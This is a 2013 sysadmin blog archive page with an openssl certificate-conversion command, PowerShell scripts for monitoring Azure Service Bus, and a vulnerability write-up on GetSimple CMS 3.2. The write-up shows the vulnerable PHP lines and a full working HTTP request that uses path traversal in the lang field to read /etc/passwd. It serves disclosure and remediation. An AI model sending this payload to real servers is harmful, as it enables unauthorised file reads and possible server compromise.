Archive for October, 2013

The place for things I find whilst learning about windows azure.

Convert apache style certificates – crt and key files to IIS compatable pfx certificates with private key using openssl


Windows Azure servicebus queue and relay REST calls for monitoring


GetSimple CMS 3.2 LFI exploit


GetSimple CMS 3.1 information disclosure vulnerability


GetSimple CMS password authentication bypass


Re-streaming sopcast with linux to ipad / iphone using ffserver ffmpeg and segmenter.


iPhone what is calaccessd?!


iPhone iOS5 poor battery life


Using powershell to search for files with date and owner criteria


Find/Search for VMWare guests mac address on ESX 4 and ESXi 4 hosts onwards


Port mirroring on nortel 5520 switch stack


Source based routing on Checkpoint SPLAT


CheckPoint R65 ndb_open: database ‘magic number’ corrupted(/opt/CPsuite-R65/fw1/database/fwauth.NDB) error


Google urchin analytics session error unable to call default routine.


VMWare ESX 4.0 iscsi volume problems.


Fedora 13 Network interface alias problems


Changing the user IIS runs as Windows 2008 IIS 7.5


Authenticating against a domain cifs share from a non domain server in IIS7.5 2008


troubleshooting activesync with exchange 2003 for iPhones


iPhone slow to wake / slide to unlock – three network


setting up replication with mysql – slave / master


How to increase your iPhone battery life – a few tips.


VMWare ESX4 guests loosing network connectivity briefly.


Howto: extract files from a .msi file


Hyperterminal / command line modem calls


Checkpoint fw monitor to debug and trace traffic.


Checkpoint FW HA debugging.


Pure-ftpd unable to list more than 2000 files.


Windows 2000/2003/2008 server Auto Admin logon


VMWare ESX4i guests power on automatically when host restarts.


Business Objects Xi3 error – The Central Management Server has failed to start. Press ‘Retry’ to attempt to start it again or ‘Cancel’ to skip any actions dependendent on the Central Management Server. (STU000213)


Find vmware guest using the MAC Address on ESX


mysql error error: ‘Can’t connect to local MySQL server through socket ‘/tmp/mysql.sock’ (2)’


How to speed up web servers and apache using DEFLATE.


Removing files with odd names dashes etc.. linux


Checkpoint anti-spoofing problems.


samba guest access


Windows 7 Graphics very slow refresh etc..


VMWare ESX3 Errrors after storage or host failure. Could not power on VM: No Swap File. Failed to power on VM


VMWare vSphere / virtual centre on Windows 7


File and printer sharing in Windows 7 inc admin c$ share.


Configuring VMWare ESX4i / vSphere for SNMP


Configuring sendmail for TLS certificate communication.


Enabling SNMP on VMWare ESX hosts


How to check how busy your VMWare esx cluster hosts are.


Adding category index to wordpress.


How to check sendmail is STARTTLS enabled


Change sort order of blogroll from name in wordpress


Checkpoint R60 VPN Debugging and killing IPSec / IKE Tunnels


MailScanner 4.77 process defunct and looping.


Google sitemaps appearing in russian!


Stop ARP responses for loopback adapters for loadbalancing.


Business Objects Xi3 Services not starting.


Killing VPN Tunnels in Checkpoint (IKE etc.)


Problem with show_image_in_imgtag.php in virtuemart missing images.


Finding duplicate files in Windows


Enabling SSH in VMWare ESX4i and making it permanent


VMware converter session not authenticated error


iplayer on Nokia E66


Joomla Metamod positioning problem


xrandr / xorg / laptop additional monitor setup (IBM X60)


Capturing and decoding POST data using tcpdump / wireshark


USB on VMWare ESX 3.5i console


Adding virtual interfaces and routes to Macbook Air


Cisco IOS Software, C3750 Software (C3750-IPBASE-M), Version 12.2(35)SE5, RELEASE SOFTWARE (fc1) IP Policy issue


Intro


Convert apache style certificates – crt and key files to IIS compatable pfx certificates with private key using openssl

This has always been a bit of an irritating command for me – I find it then forget it and it takes ages to remember the right syntax to do it the next time I need it.

So here it is using openssl

 

openssl pkcs12 -export -in mycert.crt -inkey mycert.key -out mycert.pfx -certfile ca.crt

 

Bosh

Windows Azure servicebus queue and relay REST calls for monitoring

Whilst deploying a new application to Windows Azure Cloud services, one of the components that was being used was both Servicebus relays and queues.

Traditional cloud or web services are relatively easy to monitor, usually a web or api type call, but as Servicebus doesn’t have a directly callable endpoint as such monitoring is a little more tricky.

Because its new, currently there isn’t much help on the web with regard to the REST api for servicebus, especially if its secured using ACS, so I have knocked together some scripts using powershell which call to ACS for your authorization token, then present that in a http REST call which will get in the case of a servicebus queue, the details of that queue – if there are messages in there, and in the case of relays, the name and whether there are any listeners connected.

PowerShell scripts below for Relays – it probably needs some tidying up but it does the main bits..

function Execute-HTTPPostCommand() {
param(
[string] $target = $null, [string] $Post
)

$url = $target

$parameters = $Post # your POST parameters

$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open(‘POST’, $url, $false)
$http_request.setRequestHeader(“Content-type”,”application/x-www-form-urlencoded”)
$http_request.setRequestHeader(“Content-length”, $parameters.length)
$http_request.setRequestHeader(“Connection”, “close”)
$http_request.send($parameters)
$http_request.statusText

$results = $http_request.ResponseText
return $results;

}

function Execute-HTTPGetCommand() {
param(
[string] $target = $null, [string] $authstring
)

$authnew = $authstring.Split(“=”,2)

#Write-Host “authnew”,$authnew[1]
$authnospace = $authnew[1]
$strippedauth = $authnospace -replace ‘ ‘, ”

$encmsg = [System.Web.HttpUtility]::UrlDecode($strippedauth)
$encmsg1 = [System.Web.HttpUtility]::UrlDecode($encmsg)

write-host $encmsg
$encmsg2 = $encmsg -replace ‘&wrap_access_token_expires_in=10799’, ”
$encmsg2 = $encmsg -replace ‘&wrap_access_token_expires_in=10800’, ”

write-host $encmsg2

$authfull = “WRAP access_token=`”” + $encmsg2 + “`””
$url = $target

$parameters = $Post # your POST parameters

$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open(‘GET’, $url, $false)

$http_request.setRequestHeader(“Authorization”, $authfull)
$http_request.setRequestHeader(“Connection”, “close”)
$http_request.send($parameters)
$http_request.statusText

$results = $http_request.ResponseText
return $results;

}

$post = “wrap_name=owner&wrap_password=[URIEncodedpassword]&wrap_scope=http%3A%2F%2F[namespace].servicebus.windows.net”
$URL = “https://[namespace]-sb.accesscontrol.windows.net/WRAPv0.9/”

$authstring = Execute-HTTPPostCommand $URL $post

$URL2 = “https://[namespace].servicebus.windows.net/`$Resources/Relays”

Execute-HTTPGetCommand $URL2 $authstring

 

———————- Powershell Script for querying Servicebus queues this returns if the queue is greater than 0

function Execute-HTTPPostCommand() {
param(
[string] $target = $null, [string] $Post
)

$url = $target

$parameters = $Post # your POST parameters

$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open(‘POST’, $url, $false)
$http_request.setRequestHeader(“Content-type”,”application/x-www-form-urlencoded”)
$http_request.setRequestHeader(“Content-length”, $parameters.length)
$http_request.setRequestHeader(“Connection”, “close”)
$http_request.send($parameters)
$http_request.statusText

$results = $http_request.ResponseText
return $results;

}

function Execute-HTTPGetCommand() {
param(
[string] $target = $null, [string] $authstring
)

$authnew = $authstring.Split(“=”,2)

#Write-Host “authnew”,$authnew[1]
$authnospace = $authnew[1]
$strippedauth = $authnospace -replace ‘ ‘, ”

$encmsg = [System.Web.HttpUtility]::UrlDecode($strippedauth)
$encmsg1 = [System.Web.HttpUtility]::UrlDecode($encmsg)

write-host $encmsg
$encmsg2 = $encmsg -replace ‘&wrap_access_token_expires_in=10799’, ”
$encmsg2 = $encmsg -replace ‘&wrap_access_token_expires_in=10800’, ”

write-host $encmsg2

$authfull = “WRAP access_token=`”” + $encmsg2 + “`””
$url = $target

$parameters = $Post # your POST parameters

$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open(‘GET’, $url, $false)

$http_request.setRequestHeader(“Authorization”, $authfull)
$http_request.setRequestHeader(“Connection”, “close”)
$http_request.send($parameters)
$http_request.statusText

$results = $http_request.ResponseText
return $results;

}

$post = “wrap_name=owner&wrap_password=[URIEncodedpassword]&wrap_scope=http%3A%2F%2F[namespace].servicebus.windows.net”
$URL = “https://[namespace]-sb.accesscontrol.windows.net/WRAPv0.9/”

$authstring = Execute-HTTPPostCommand $URL $post

$URL2 = “https://[namespace].servicebus.windows.net/`$Resources/Queues?`$filter=MessageCount%20Gt%200”

Execute-HTTPGetCommand $URL2 $authstring

 

GetSimple CMS 3.2 LFI exploit

Following on my series of GetSimple CMS articles this one details a LFI (Local file inclusion) vulnerability which is present in current and current beta versions – 3.2beta.

As per the previous article this requires you to be logged in as a valid user.

The code at fault is in the settings.php page and is the language parameter, I have listed the section below:

if(isset($_POST[‘lang’])) {
$LANG = $_POST[‘lang’];

Then its used here
include(GSLANGPATH.$LANG.’.php’);

So for example if you post the following request, you will get the /etc/passwd file which given these days they contain no passwords is probably the least of your worries, more likely an attacker would be after other files with credentials in.

POST /admin/settings.php HTTP/1.1
Host: getsimplecmshost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://getsimplecmshost/admin/settings.php
Cookie: validcookie
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 315

nonce=validnonce&sitename=GetSimpleCMSSite&siteurl=http%3A%2F%2Fgetsimplehost%2F&permalink=&user=admin&email=admin@domainname&timezone=Europe%2FLondon&lang=../../../../../../../../etc/passwd%00&show_htmleditor=1&sitepwd=&sitepwd_confirm=&submitted=Save+Settings

As I’ve mentioned in previous articles whilst this requires a valid user, its not acceptable that even an authenticated user can read files off the local file system – especially in the case of hosted systems.

In extreme circumstances this LFI can also lead to complete server compromise using a technique where php code is injected into files which are readable by the web process and subsequently included in the above request and executed.

Again simple user input validation would completely reduce this attack.